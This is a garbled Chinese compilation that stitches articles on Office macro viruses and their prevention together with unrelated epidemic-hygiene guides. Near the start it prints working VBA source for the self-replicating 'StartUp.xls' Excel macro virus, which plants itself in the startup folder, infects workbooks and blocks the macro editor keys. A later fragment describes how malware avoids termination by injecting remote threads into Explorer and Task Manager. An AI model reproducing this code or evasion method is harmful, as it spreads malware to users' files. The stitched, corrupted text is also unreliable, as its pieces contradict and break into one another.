宏病毒 病毒的自我保护 防御办法
宏病毒原理及防范
宏病毒原理及防范一、常见宏病毒1.startup宏病毒宏病毒其实并不神秘,其工作原理是借用宏表4.0的auto_open事件启动病毒代码的复制和病毒文件的新建,新建的文件常放在xlsrt文件夹下。
然后利用xlstart文件夹文件可以自动启动的原理把病毒代码复制到新打开的excel文件中。
下面先看看startup宏病毒代码吧,注意红字部分。
Sub auto_open()On Error Resume NextIf ThisWorkbook.Path <> Application.StartupPath AndDir(Application.StartupPath & "\" & "StartUp.xls") = "" ThenApplication.ScreenUpdating = FalseThisWorkbook.Sheets("StartUp").CopyActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")n$ = ActiveWindow.Visible = FalseWorkbooks("StartUp.xls").SaveWorkbooks(n$).Close (False)End IfApplication.OnSheetActivate = "StartUp.xls!cop"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnKey "%{F8}", "StartUp.xls!escape"End SubSub cop()On Error Resume NextIf ActiveWorkbook.Sheets(1).Name <> "StartUp" ThenApplication.ScreenUpdating = Falsen$ = Workbooks("StartUp.xls").Sheets("StartUp").Copybefore:=Worksheets(1)Sheets(n$).SelectEnd IfEnd Sub2.book1病毒book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。
如何保护自己免受病毒的侵害
如何保护自己免受病毒的侵害近年来,病毒偷偷地成为了人们生活中无法避免的一部分。
无论是在互联网上,还是现实生活中的传染病,病毒的存在使得我们需要更多地了解如何保护自己免受病毒的侵害。
一、加强个人卫生习惯
首先,保持良好的个人卫生习惯是避免病毒感染的基础条件。
洗手是保持个人卫生的最基本方法,要注意洗手的时间、使用的肥皂种类和清洗的区域。
饮食卫生同样非常重要,尤其是生吃的食物,如各类水果、蔬菜等。
二、合理使用防护设备
其次,合理使用防护设备也是保护自己免受病毒侵害的方法之一。
合适的防护设备包括口罩、手套、护目镜等。
在公共场所或者医院,戴口罩可以有效地预防空气传播的病毒,护目镜可以保护眼部,手套可以避免接触有害物质。
三、定期体检
此外,定期的体检也可以发现病毒感染的风险,及时诊治。
人
体抵抗力低下时,容易受病毒攻击,因此应当保持良好的习惯,
如定期运动锻炼、养成良好的作息习惯等都可以提高人体免疫力。
四、保持良好的心态
最后,保持良好的心态也是预防病毒的方式之一。
心情不好、
情绪波动、压力大容易导致人体机能下降,从而影响人体免疫力,容易受到病毒的攻击。
保持良好的心态,积极面对生活的种种,
不仅可以提高免疫力,还有助于消除各种隐患。
总之,病毒是无形的,但预防感染却是必不可少的。
无论是哪
种方法,都是需要坚持的。
我们应该积极学习病毒的知识,了解
预防病毒的方法,不断改进个人卫生习惯,提高自身免疫力。
只
有这样,才能在日常生活中更好地保护自己。
宏病毒及其防治方法
宏病毒及其防治方法探析摘要:宏病毒的出现对办公软件的安全使用带来了极大的威胁,故文章在深入研究宏病毒作用机制的基础上,从发现病毒、清除病毒以及预防病毒三个方面对其防治方法进行了探析,以供参考。
关键词:宏病毒作用机制防治方法前言:微软公司的microsoft word 几乎已经成为目前全世界办公文档的事实工业标准,而宏病毒就是是针对的字处理软件word 编写的一种病毒,其种类达数百种,危害日甚一日,感染率高达40%以上,已成为威胁计算机信息系统安全的主要因素。
因此,对其作用机制进行深入研究,制定切实有效的防治方法,从而最大限度地降低病毒带来的危害是十分必要的。
1.宏病毒的作用机制word 的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素: 菜单、宏、格式( 如备忘录等)。
word 处理文档需要同时进行各种不同的动作,如打开文件、关闭文件、读取数据资料以及储存和打印等等。
每一种动作其实都对应着特定的宏命令。
通常,word 宏病毒至少会包含一个以上的自动宏( 如autoopen、autoclose、autoexec、autoexit和autonew 等) ,或者是一个以上的标准宏,如fileopen、filesaveas等。
如果某个.doc 文件感染了这类word 宏病毒,则当word 运行这类自动宏时,实际上就是运行了病毒代码。
一旦病毒宏侵入word 系统,它就会替代原有的正常宏,如fileopen、filesave、filesaveas 和fileprint 等,并通过这些宏所关联的文件操作功能获取对文件交换的控制。
当某项功能被调用时,相应的病毒宏就会篡夺控制权,实施病毒所定义的非法操作,包括传染操作、表现操作以及破坏操作等。
宏病毒主要寄生于autoopen、autoclose 和autonew 3 个宏中,其引导、传染、表现或破坏均通过宏指令来完成的。
传染病联控有效的个人防护措施
传染病联控有效的个人防护措施随着传染病的频繁爆发,个人防护措施成为了每个人生活中必不可少的一部分。
良好的个人防护措施不仅可以保护自身健康,也能够有效地减少疾病的传播。
本文将介绍一些传染病联控有效的个人防护措施,帮助人们更好地保护自己和他人。
一、勤洗手洁净的双手是预防传染病最简单而又最有效的方法之一。
通过常规洗手可以有效清除手部潜藏的细菌和病毒。
在日常生活中,我们接触到许多带有细菌和病毒的物体,如门把手、电梯按键、公共交通工具等等。
因此,要养成勤洗手的好习惯,尤其是在接触这些公共场所后,或是进食、接触动物等前后,务必充分清洁双手。
使用温水和肥皂,用力揉搓双手20秒左右,包括双手的每个角落以及指甲缝。
洗手液和洗手搓手液也可以作为替代品使用。
二、正确戴口罩口罩是抵御空气传染病的重要防护物品。
通过戴口罩可以有效地避免自己的呼吸道暴露在空气中的有害细菌和病毒中。
在公共场所,尤其是人员密集的地方,佩戴口罩能够减少传染性病毒的传播。
但需要注意的是,正确戴口罩才能发挥最大的防护效果。
在佩戴口罩前,要先洗净双手;将口罩展开并固定在鼻子和嘴巴上,确保口罩能够完全遮盖鼻子和嘴巴,并贴合脸部;佩戴口罩时勿随意触摸口罩表面,如果需要摘下口罩,务必先用洁净的双手拔掉口罩的绑带。
三、保持社交距离在疫情期间,保持一定的社交距离是非常重要的。
通过和他人保持一定的距离,可以减少因为直接接触导致的疾病传播。
一般来说,保持与他人1到2米的距离较为安全。
避免亲密接触,尽量保持距离,特别是在公共场所和人员密集的地方。
好的个人防护习惯,如避免握手、拥抱、接吻等行为,都能够减少接触并控制疾病的传播。
四、注意打喷嚏礼仪打喷嚏是人体的一种自我保护反应,但是在传染病防控中,不注意打喷嚏礼仪会导致疾病的传播。
当你感觉到要打喷嚏时,应该使用纸巾、手帕等物品遮住口鼻,以避免飞沫扩散。
如果没有纸巾或手帕,可以用手肘弯部遮住口鼻,但要避免用手直接遮挡,以防止细菌和病毒通过手部传播。
电脑病毒宏病毒的预防方式
电脑病毒宏病毒的预防方式下面店铺教你电脑病毒宏病毒预防方式,希望你能学会,能够帮助到你!欢迎回访!!病毒预防编辑Microsoft公司的Word字处理软件因其功能强大,使用方便等诸多优点受到广大使用者的青睐,版本从2.0、5.0、6.0直7.0(Word95)、8.0(Word97),不断升级。
Word的推广使用,确实为文本处理工作带来了极大的便利,但随之而来的宏病毒也平添了不少烦脑。
宏病毒困扰着用Word处理的文本,轻则文本不能正常存储,重则变成乱码,甚至磁盘被格式化,使许多普通用户谈“宏”变色。
实际上,在了解了Word宏病毒的编制、发作过程之后,即使是普通的电脑用户,不借助任何杀毒软件,也可以较好地对其进行防治。
Word宏病毒是一种用专门的Basic语言即WordBasic编写的程序。
与其它计算机病毒一样,它能对用户系统中的可执行文件和数据、文本类文件造成破坏。
Word中提供由用户编制宏这一功能是为了让用户能够用简单的程序,简化一些经常重复性的操作,与DOS中的批处理文件类似。
Word宏的编制技术,与其它复杂的编程技术相比,要求很低很容易编制,这就为心怀恶意的计算机用户提供了一种简单高效的制造病毒手段。
但也正因其编制简单,使宏病毒的防治远较那些用复杂的编程语言编制的病毒容易得多。
下面就谈在日常用Word处理文本时,如何预防和消除宏病毒。
防止“病从口入”是对付所有病毒的指导思想,同样对付宏病毒的重点也应该放在对其预防上。
Word宏病毒的触发条件是在启动或调用Word文档时,自动触发执行,因此,只要不打开被感染的文本,宏病毒是不会传播的。
如果打开了带毒的文本,其它没打开的文本不会被感染;即使是打开了其它文本,只要不存盘,也不会感染到硬盘中的文本。
Word本身不带病毒,即初次进入Word环境时没有病毒,一旦在其中打开带宏病毒的文件,病毒就会留在Word环境中,如果这时打开其它文件,这些文件就会被感染;更严重的是,关闭Word时的环境就带上了宏病毒,而这时处理的所有文档都将感染上宏病毒。
宏病毒的探究及防治
宏病毒的探究及防治【摘要】宏病毒是针对 Office 软件所包含的自动宏命令编写的一种具有传播、感染能力的病毒程序。
宏作为办公软件的一个创新功能,可把操作程序简化,但同时也提高了宏病毒的传播与感染率。
本文从宏病毒的概念出发,介绍了宏病毒的类型、运行机制、防治方法,以此来帮助用户在遭遇宏病毒攻击时做出正确的应对措施,保护计算机中数据的安全。
【关键词】计算机病毒;宏病毒;Office 软件计算机及网络技术的飞速发展就像把双刃剑,在便捷人们生活的同时,也为宏病毒的蔓延与传播提供了方便,虽然人们都研制出各具特色的方法来抵御宏病毒,但宏病毒具有多样性,新的病毒被消灭,就会有其他宏病毒浮出水面,这对人们抵御宏病毒工作带来了诸多麻烦。
一、宏病毒的概念所谓“宏”就是在使用软件工作时,为了避免相同的操作,用简单的语法而设计出来的一种工具,在办公软件中宏可使用一系列命令。
宏语言是用于在特定应用程序中自动执行特定序列的命令措辞,宏通过自动完成特定方法来简化复杂的过程并使其更适合。
什么叫“宏病毒”,就是针对 Office 软件所包含的自动宏命令编写的一种具有传播、感染能力的病毒程序。
宏病毒可以存在于Word、Excel、Database、PowerPoint 等数据文件中,可在一些处理数据的系统中运行,利用宏程序特殊的功能,将自己复制到其他数据处理文件中。
宏作为办公软件中一个创意性的新功能,利用宏可以帮助用户简化操作,但同时也为宏病毒的传播和感染提供了便利,但他们也产生能够处理和产生office文件的宏病毒,这使Microsoft Word 和 Microsoft Excel成为宏病毒的首要攻击对象,宏病毒可以影响 PC 和 Mac。
如图所示。
二、宏病毒的类型1.Concept病毒Concept病毒是最“有名”的宏病毒。
它于1995年首次出现,专门用于感染Microsoft Word 文档。
这也是第一次病毒通过将自身附加到文档而不是应用程序进行传播。
防御、清除Excel宏病毒的方法
防御、清除Excel宏病毒的方法
1、安装Office2007以上版本,如果使用Office2007以下版本的Execl禁用宏的操作与本文档
提供的方法有所区别,并且防御宏病毒的能力没有高版本强,所以推荐升级到Office2007以上版本。
2、禁用宏对宏病毒进行防御(如果使用到宏的功能请按照实际需求进行设置),具体方法
如下:
Excel选项->信任中心->信任中心设置->宏设置->禁用所有宏,并且不通知
3、手工删除Execl启动时自动打开的文件,查看Office安装目录XLSTART目录下是否存在有
文件(例:c:\Program Files\Microsoft Office\Office12\XLSTART\),如果存在文件并经过确认不是使用者设置的在Excle启动时自动打开的文件请将其删除。
4、清除现有文件中的宏病毒,使用专杀工具对所有分区进行扫描(Windows Vista以上版
本需要使用“以管理员身份运行”)。
MacroKiller.zip
如有问题请与信息工程部联系。
传染病疫情下的居民自我防护指南
传染病疫情下的居民自我防护指南在当前全球范围内流行的传染病疫情中,居民自我防护尤为重要。
正确的防护措施可以帮助我们有效预防疾病的传播,并保护自己和他人的健康。
本文将就传染病疫情下的居民自我防护,为大家提供一些实用的指南。
一、保持个人卫生1.经常洗手:将双手彻底清洗干净是预防传染病的基本措施。
使用肥皂和流水,至少要洗20秒钟,包括双手的前后、指缝、指甲和手腕等部位。
如果无法使用流水,使用含酒精的免洗手消毒液也是不错的选择。
2.避免触摸面部:我们的手部经常接触到外界的各类物体,这些物体上可能携带着病原体。
我们应尽量避免触摸眼、鼻和口等面部部位,以减少病原体进入体内的机会。
3.咳嗽和打喷嚏的正确姿势:当我们咳嗽或打喷嚏时,应用纸巾或肘部遮住口鼻,以防止病原体通过飞沫传播。
二、保持良好的室内环境卫生1.保持室内空气流通:经常开窗通风可以有效地改善室内空气质量,减少病原体在室内的积聚。
室内空调和暖气系统也需要定期清洁和维护,以确保其正常运行。
2.定期清洁卫生:保持室内的整洁和清洁,定期清洁家具、地板、门把手、水龙头等易接触的表面。
使用含有消毒成分的清洁剂可以有效杀灭病菌和病毒。
三、避免人群聚集和外出1.尽量避免不必要的接触:在传染病疫情期间,尽量减少与他人近距离接触,避免人员密集的场所,如商场、剧场和体育馆等。
2.推迟或取消聚会和旅行计划:遵循相关部门的指导,避免参加大型聚会、婚庆和其他社交活动。
如果没有必要,最好推迟或取消旅行计划,以减少感染的风险。
四、健康监测与就医1.关注自身健康状况:密切关注身体是否出现发热、咳嗽、乏力等症状。
如有持续出现症状,应尽早联系医疗机构并就医。
2.配合疫情防控调查:如果身边有人被确诊感染,应积极配合相关部门进行流行病学调查和疫情防控工作,为疫情防控贡献自己的力量。
总之,在传染病疫情下,每个居民都应该积极采取自我防护措施,保护好自己和他人的健康。
通过正确的个人卫生、良好的室内环境卫生、避免人群聚集和外出,以及健康监测与就医等方面的努力,我们可以一起战胜疫情,共同促进社会的健康和稳定。
VBA安全性设置和防止病毒攻击的方法
VBA安全性设置和防止病毒攻击的方法随着计算机技术的不断发展,机器学习与人工智能的兴起,数据处理和自动化在商业和个人领域变得越来越普遍。
其中,微软的Visual Basic for Applications(VBA)作为一种强大的宏语言,被广泛应用于Microsoft Office套件中的各种应用程序,例如Excel、Word和PowerPoint。
然而,正是由于其广泛使用和强大的功能,VBA也成为了黑客和恶意软件攻击的目标。
为了保护个人和商业用户的数据安全,我们需要了解VBA安全性设置和防止病毒攻击的方法。
VBA是一种将自动化任务与Microsoft Office应用程序集成的宏语言。
通过使用VBA,用户可以编写自定义的宏代码,以减少人工处理和增加自动化任务的效率。
然而,这种方便性也为黑客提供了一条突破安全防线的途径。
为了确保VBA的安全性,可采取以下方法:1. 启用宏设置:默认情况下,Office应用程序会禁用宏功能,以防止潜在的安全风险。
因此,在使用VBA之前,需要确保已启用宏。
可以通过“文件”->“选项”->“信任中心”->“信任中心设置”来访问宏设置,并确保正确设置了信任中心选项。
2. 使用数字签名:为了确保宏的来源和完整性,可以使用数字签名来为VBA项目提供可信的标识。
数字签名使用数字证书验证VBA项目的作者,并验证代码是否被篡改。
通过数字签名,用户可以判断VBA项目是否来自受信任的来源,并能够保证代码的完整性。
3. 宏安全设置:Office应用程序提供了宏安全级别的设置,可以根据需要进行调整。
高安全级别将禁用所有宏,中等安全级别将只允许在受信任的位置运行宏,而较低的安全级别则可能允许所有宏运行。
根据需要,可以在宏安全设置中选择适当的安全级别,以平衡安全性和功能需求。
4. 安全的文件共享:当共享包含VBA宏的文件时,需要注意确保安全性。
推荐以只读方式共享文件,避免其他用户篡改宏代码。
office如何有效预防宏病毒
Office如何有效预防宏病毒简介宏病毒是一种利用Microsoft Office软件中的宏功能传播的恶意软件。
宏病毒可以通过恶意宏代码来执行各种破坏行为,如破坏、删除或篡改文件。
在工作环境中,使用Microsoft Office软件是不可避免的。
然而,有效预防宏病毒的传播变得尤为重要。
本文将介绍一些有效的预防宏病毒的方法,帮助您保护您的数据和计算机安全。
方法一:启用安全设置Microsoft Office软件提供了一些内置的安全设置,可以帮助有效预防宏病毒的传播。
以下是一些重要的安全设置:1. 禁用自动宏运行默认情况下,Office软件启用自动宏运行。
禁用自动宏运行可以防止恶意宏在打开文档时自动执行。
要禁用自动宏运行,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“宏设置”中,选择“禁用所有宏,并禁用通知”选项。
2. 禁用宏如果您不需要使用宏功能,禁用宏是一种有效的预防宏病毒的办法。
要禁用宏,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“宏设置”中,选择“不允许任何宏运行”选项。
3. 启用受信任的位置有时,您可能需要运行特定的宏或从受信任的位置打开文档。
为了更好地控制宏的运行,可以将受信任的位置添加到Office软件的信任中心。
要启用受信任的位置,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“受信任的位置”中,点击“添加新位置”按钮。
方法二:保持软件升级定期升级Microsoft Office软件是预防宏病毒的另一个重要步骤。
每个Office升级都包含了最新的安全补丁和修复程序,可以提供额外的安全保障。
要确保软件始终保持最新状态,可以按照以下步骤操作:•打开Office软件,点击“文件”菜单。
宏病毒 病毒的自我保护 防御办法
2. 虚拟执行技术
技术通过虚拟执行方法查杀病毒,可以对付加密、变形、 异型及病毒生产机生产的病毒,具有如下特点: 在查杀病毒时在机器虚拟内存中模拟出一个“指令执行虚 拟机器” 在虚拟机环境中虚拟执行(不会被实际执行)可疑带毒文 件 在执行过程中,从虚拟机环境内截获文件数据,如果含有 可疑病毒代码,则杀毒后将其还原到原文件中,从而实现 对各类可执行文件内病毒的查杀
工具菜单中的选项宏病毒防范?通过disableautomacros宏指令来禁止使用自动宏subautoexecwordbasicdisableautomacrostrueendsub病毒的自我保护病毒的自我保护手段?反静态反汇编技术?数据的压缩与数据加密病毒的自我保护手段续?反静态逆向工程技术?干扰代码技术向设备的偏移量为100h处进行写操作病毒的自我保护手段续?多态变形技术?病毒程序的设计者为了使病毒代码躲避扫描程序的监察不断对自身的执行代码进行变换尽量隐藏扫描程序依据的病毒特征代码从而使得扫描程序无法正确侦测和清除该病毒
பைடு நூலகம்
两个辅助线程相互实时监视,如果监视对象被关闭了,就重新 创建线程或进程。其实,在程序中选择的远程进程驻体为 Explorer.exe和Taskmgr.exe。在通常情况下,如果用户知道 了远程线程的驻体为资源管理器后,就会打开任务管理器来结 束Explorer,这时再把 为资源管理器后,就会打开任务管理器 来结束 p ,这时再把远程线程驻入到任务管理器中。也就是说, 只要Explorer或Taskmgr有一个存在,就不可能结束主进程。 如果有其他Kill进程的工具,你就可以将其关闭掉,只要资源 管理器和任务管理器均不存在时,就没有驻体来维持远程进程。 不过,如果我们选择的远程进程为随机的,这就不容易发现了; 如果我们选择的远程进程为系统文件(如smss.exe会话管理 器),那么你是不会安全的结束远程线程,除非系统崩溃。
预防和清除宏病毒的方法
预防和清除宏病毒的方法摘要:宏是WORD中避免一再的重复相同的动作而设计出来的一种工具,宏病毒就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。
本文首先分析宏病毒的特性,并就如何检测、清除及预防进行了探讨。
关键词:宏病毒;WORD;预防;清除Abstract: The macro is a tool designed to avoid repeated the same action in the WORD, and a macro virus is the copy and infectious macro using the software to support macros written. This paper first analyzes the characteristics of macro virus, and discusses on how to detect, removal and prevent it.Key words: macro virus; WORD; prevention; clear所谓宏病毒,就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。
宏病毒是一种新形态的计算机病毒,也是一种跨平台式计算机病毒。
1.宏病毒的工作原理在用W O R D 处理文档时,需要同时进行各种不同的动作,每一种动作其实都对应着特定的宏命令。
宏病毒的感染过程和破坏行为与WORD 的文件宏程序的操作密切相关,这些宏程序可能就是宏病毒的插入点。
病毒包含在宏中时,只要染毒的文件被打开,病毒的宏程序就可能会被执行,进而取得系统控制权,进行感染和破坏。
为了能广泛地传播,宏病毒大都采用感染通用模版NORMAL.DOT 的方法将自己复制到其他文档中去。
W O R D启动时总是自动打开通用模版,这就为宏病毒在每次启动WORD 时能够取得系统控制权提供了机会。
含有自动宏的染毒文档,当被其他计算机的WORD 打开时,也会自动感染该计算机。
电脑病毒的防范和清除方法
电脑病毒的防范和清除方法1、宏病毒的防范和清除内容一、宏病毒的防范。
(1)安装Word 软件包时,系统中包含有关于宏病毒防护的选项,其默认状态是允许【宏病毒保护】复选框,这是防护宏病毒的天然屏障!(2)开启Word宏检查:【工具】→【宏】→【安全性】命令,将安全级别设为【非常高】。
只要打开一个含有可能携带病毒的宏的文档时,它能够显示宏警告信息。
为了防止可能发生的病毒传染,打开文档过程中出现宏警告提示时最好选择【取消宏】。
(3)点击word的“新建”菜单,右边的“新建文档”提供了一系列模板。
将常用的Word模板文件改为只读属性,可防止Word系统被感染。
(4)在word的【工具】→【选项】→【保存】中选中【提示保存Normal模板】,并取消【允许快速保存】。
在【工具】→【模板和加载项】中,清理弹出对话框中的【共用模板和加载项】列表中预先加载的文件,不必要的就不加载。
必须加载的要确认没有选中【自动更新文档样式】。
内容二、手工清除宏病毒(1)“工具”→“宏”→“管理器”→“宏”的一页,在“宏有效范围”下拉列表框中打开要检查的文档。
若发现AutoOpen、AutoClose、AutoNew等自动宏以及FileSave、FileSaveAs、FileExit等文件操作宏或一些怪名字的宏,如AAAZAO、PayLoad等,立刻删除,然后将Normal.dot置成只读方式。
(2)在打开Word文档时,按住[Shift]键,也可达到禁止自动宏的目的。
2、用修改注册表的方法清除病毒(1)调出 WINDOWS 任务管理器,查看系统运行的进程,判断这些进程是否是病毒产生的,也可以查看 CPU 和内存的当前状态,找到后直接将它结束。
如:震荡波病毒是avserve.exe,冲击波病毒是msblast.exe,QQ女友病毒是Internet.exe或Svch0st.exe。
(2)查看 WINDOWS 当前启动的服务项,在“控制面板”→“管理工具”→“服务”→“启动”。
宏病毒的查杀与防治
14
宏病毒的查杀及预防
1、提高对宏病毒的警惕性 在office办公软件当中,在 工具—宏—安全性 选项当中把宏安全性设置为 高。 2、时刻保持杀毒软件的正常运行 把杀毒软件的更新设置为自动更新,打开杀毒软 件所有的杀毒选项 3、不要随意打开不明电子邮件 宏病毒寄存在文档当中,通过邮件及U盘拷贝等形 式传播。在收到不明来历的电子邮件,马上删除。例 如:邮件标题为人才调查、人才招聘、财务报表、公 司计划等不明来历具有诱惑性的邮件
宏病毒的查杀及预防151提高对宏病毒的警惕性在office办公软件当中在工具宏安全性选项当中把宏安全性设置为2时刻保持杀毒软件的正常运行把杀毒软件的更新设置为自动更新打开杀毒软件所有的杀毒选项3不要随意打开不明电子邮件宏病毒寄存在文档当中通过邮件及u盘拷贝等形式传播
宏病毒识别与防治
网络管理中心 二〇一二年十月
7
宏病毒的识别
3、如果杀毒软件中关于宏病毒防护选项启用后,不能在下次开 机时依然保存。 OFFICE中提供了对宏病毒的防护功能,它可以在 “工具/选项/常规”中进行设定。但有些宏病毒为了对付OFFICE 中提供的宏警告功能,它在感染系统后,会在每次退出 OFFICE时 自动屏蔽掉宏病毒防护选项。因此一旦发现机器中设置的宏病毒防 护功能选项无法在两次启动WORD之间保持有效,则系统已经感染 了宏病毒。也就是说一系列WORD模板、特别是office目录下的 normal.dot 已经被感染。
5
宏病毒的概念
宏病毒的起源
宏病毒在上个世纪90年代得益于网络及电子邮件 的发展而广泛传播。宏病毒主要感染文件有 word、 Excel 的文档。并且会驻留在系统内存上。因为这种 病毒活动特征区别于电脑病毒,所以一般的杀毒软件 不会报警。只有在用户打开及保存以上两种文档时感 染文件。
关于宏病毒的处理及预防措施
关于宏病毒的处理及预防措施
一旦发现计算机office软件打开后弹出系统警告框,并且无法“另存为”,就表示该文件已感染宏病毒,此时不能再打开其他文件,否则病毒也会感染,应马上关闭删除该文件,若文件重要不能删除,请按以下步骤进行:
(一)用杀毒软件全盘扫面,处理感染文件
(二)开启禁用宏进行防止再次感染病毒。
以Office2010为例:
一:点击左上角,选中“选项”:
二:进入选项后选择信任中心,进入右下角“信任中心设置”:
三:选择宏设置,选中“禁用所有宏,并发出通知”
科技部
2014年5月27日。
如何防御计算机病毒
如何防御计算机病毒病毒老是来攻击我们计算机,那么我们要怎么样去防御呢?下面由小编给你做出详细的防御计算机病毒方法介绍!希望对你有帮助!防御计算机病毒方法一:1.预防第一保持获取信息。
你是否知晓几乎每天都有病毒和安全警告出现?通过把我们的安全与修复主页加入收藏夹来获取最新爆发的病毒。
2.得到保护如果你的机器上没有安装病毒防护软件,你最好还是安装一个。
如果你是一个家庭或者个人用户,下载任何一个排名最佳的程序都相当容易,而且可以按照安装向导进行操作。
如果你在一个网络中,首先咨询你的网络管理员。
3.定期扫描你的系统如果你刚好是第一次启动防病毒软件,最好让它扫描一下你的整个系统。
干净并且无病毒问题地启动你的电脑是很好的一件事情。
通常,防病毒程都能够设置成在计算机每次启动时扫描系统或者在定期计划的基础上运行。
一些程序还可以在你连接到互联网上时在后台扫描系统。
定期扫描系统是否感染有病毒,最好成为你的习惯。
4.更新你的防病毒软件既然你安装了病毒防护软件,就应该确保它是最新的。
一些防病毒程序带有自动连接到互联网上,并且只要软件厂商发现了一种新的威胁就会添加新的病毒探测代码的功能。
你还可以在此扫描系统查找最新的安全更新文件。
5.不要轻易执行附件中的EXE和COM等可执行程序这些附件极有可能带有计算机病毒或是黑客程序,轻易运行,很可能带来不可预测的结果。
对于认识的朋友和陌生人发过来的电子函件中的可执行程序附件都必须检查,确定无异后才可使用。
6.不要轻易打开附件中的文档文件对方发送过来的电子函件及相关附件的文档,首先要用“另存为。
”命令(“Save As.。
”)保存到本地硬盘,待用查杀计算机病毒软件检查无毒后才可以打开使用。
如果用鼠标直接点击两下DOC、XLS等附件文档,会自动启用Word或Excel,如有附件中有计算机病毒则会立刻传染;如有“是否启用宏”的提示,那绝对不要轻易打开,否则极有可能传染上电子函件计算机病毒。
宏病毒防治
宏是Word 里一个非常有用的工具,但也是Word 的安全漏洞之一。
有一些恶意的人利用宏制造宏病毒,给别人带来麻烦。
宏病毒是一种寄存在文档或模板的宏中的计算机病毒。
一旦打开这样的文档,宏病毒就会被激活,转移到计算机上,并驻留在Normal 模板上。
从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
13.1 宏病毒宏病毒已经成为发展最快和传播最迅速的病毒。
美国国际计算机安全协会ICSA 的《ICSA 1998 病毒流行调查报告》表明宏病毒独占1998 年十大病毒感染事件的72%,在十大病毒中占了五席交椅:WM/Concept、WM/Cap、WM/Wazzu、WM/Npad 和XM/Laroux。
根据DataFellow 公司每天特征码升级的F-Macro 所检测到的宏病毒数目,至1998 年12 月达到了3,332 个,而在1997 年12 月才是1,821个,增长率为83.0%。
而且F-Macro 并不能检测到所有宏病毒。
在1998 年12 月出现了Word Class Object 的宏病毒,是由VicodinES编写的。
13.1.1 宏病毒许多应用程序都允许在用户的数据库中包含一些宏,随着应用软件的进步,宏语言的功能也越来越强大,其中微软的Word VisualBasic for Application(VBA)已经成为应用软件宏语言的标准。
利用宏语言,可以实现几乎所有的操作,还可以实现一些应用软件原来没有的功能。
每个模板或数据文件中,都可以包含宏命令。
有不少应用软件允许用户利用宏修改软件菜单的功能,并可以将某一个宏加入到菜单中或设置成自动运行的命令。
利用这个功能,宏就可以修改软件本身的功能,从而将软件本身修改为病毒传播的源泉。
宏病毒就是利用Word VBA 进行编写的一些宏,这些宏可以自动运行,干扰用户工作,轻则降低工作效率,重则破坏文件,使用户遭受巨大损失。
关于宏病毒的判断、清除和预防
关于宏病毒的判断、清除和预防关于宏病毒的判断、清除和预防2011年01月15日星期六下午01:09关于宏病毒的判断和预防前两天从EXCEL论坛里下载了一个帖子的附件(当然我认为该帖的发表人也不知道文件里有病毒),没想里面有宏病毒"StartUp.xls"在打开文件时提示,缺少"StartUp.xls"。
因为论坛里有很多附件是包含宏的,为了使用时方便,因此我EXCEL中关于宏安全性设置的是"低"。
没想到造成了大错,在此提醒各位一定要将EXCEL中"工具→宏→安全性→安全级"设置为中,打开文件时要确认该文件是否包含宏。
对于宏病毒的判断:当安全级选为中时,如果一旦发现自己的不包含宏的文件打开时提示该文件包含宏,那么恭喜你已经中招了。
此时一定要注意所有打开的文件(指WORD、EXCEL文件)不要存盘,因为宏病毒只有存盘后才会被感染,如果需要将文件进行保存,建议存储为TXT格式,然后从新进行排版。
一定要将打开的文件作好备份再进行杀毒。
我从昨日中午发现机器里被感染病毒,先后使用了"esetsmartsecurity""瑞星天空网站版""360杀毒软件最新版",但前两个软件均没有查出该病毒。
只有360查了出来并将病毒清除。
注意:在杀毒时不要选择"自动处理扫描出的病毒威胁"因为杀毒软件有可能会直接将文件删除,到时重要文件被删掉可是哭都来不及了,当其查出中毒文件后如是重要文件一定要将其重新存储为TXT格式,也可以使用XP自带的"写字板"(注意不是记事本)将word文件直接打开,并将内容保存下来,然后再交给杀毒软件处理。
这样就能保证文件内容不会丢失了。
excel宏病毒是怎么来的随着Internet在中国的迅速拓展,特别是中国教育和科研计算机网(CERNET)以及商业性的ChinaNet和COMNet的发展,电子邮件同样成为许多网络用户使用的工具,互联的校园网络在促进学校科研教育发展的同时,也非常容易成为网络攻击的对象,特别是在网络建设的初期,网络安全意识和网络防范能力都较为薄弱.据透露,一种新的致命病毒---Hare病毒定于近期"发作".Hare病毒届时将显示HDEuthanasia的信息,然后企图重写计算机硬盘上的全部文件.英国《病毒公报》编辑IanWhalley指出,Hare极为复杂,而且很难查出.它是借Internet传播的,未激活版本已在几个国家发现,其中包括美国.另外一种新病毒属于被称为"宏病毒"的传染病毒家族,宏病毒于一年前首次被发现.这种新病毒称为roux,是首例感染Microsoft公司Excell 电子表格的病毒.Laroux的表现很像目前常见的Word.concept病毒,后者在MicrosoftWord生成的文档中传播.Laroux可做为电子表格的附件进入电子邮件,或以其他同电子表格相同的传送方式传播.据美国全国计算机安全协会(NCSA)称,这种病毒相对来说没有什么危害,但可导致少数系统的"应用软件异常".NCSA指出,Laroux看上去比Word.concept传播的速度要慢,因为Excel不像Word使用那么广泛,而且用户不常共用电子表格,而文字处理器文档则经常共用.去年,用户经受的宏病毒猛增了5倍,安全专家把这主要归结为一个因素--电子邮件的迅速增加。
病毒防控 人人有责 病毒预防知识与个人防护措施
病毒防控人人有责病毒预防知识与个人防护措施在当前全球疫情形势下,病毒防控已成为每个人都应该关注和参与的重要问题。
疾病的传播速度与范围广泛,为了保护每个人的健康和生命安全,每个人都有责任了解和采取相应的病毒预防知识和个人防护措施。
本文将从以下几个方面介绍病毒预防知识和个人防护措施。
首先,了解病毒的传播途径对于预防病毒传播至关重要。
病毒可以通过空气飞沫、接触传播、食物和水等多种途径传播。
其中,空气飞沫是最常见的传播方式,例如咳嗽、打喷嚏时会释放病毒颗粒,如果周围人没有正确戴口罩,就很容易被感染。
此外,病毒还可以通过接触传播,即直接接触感染者的体液、分泌物等。
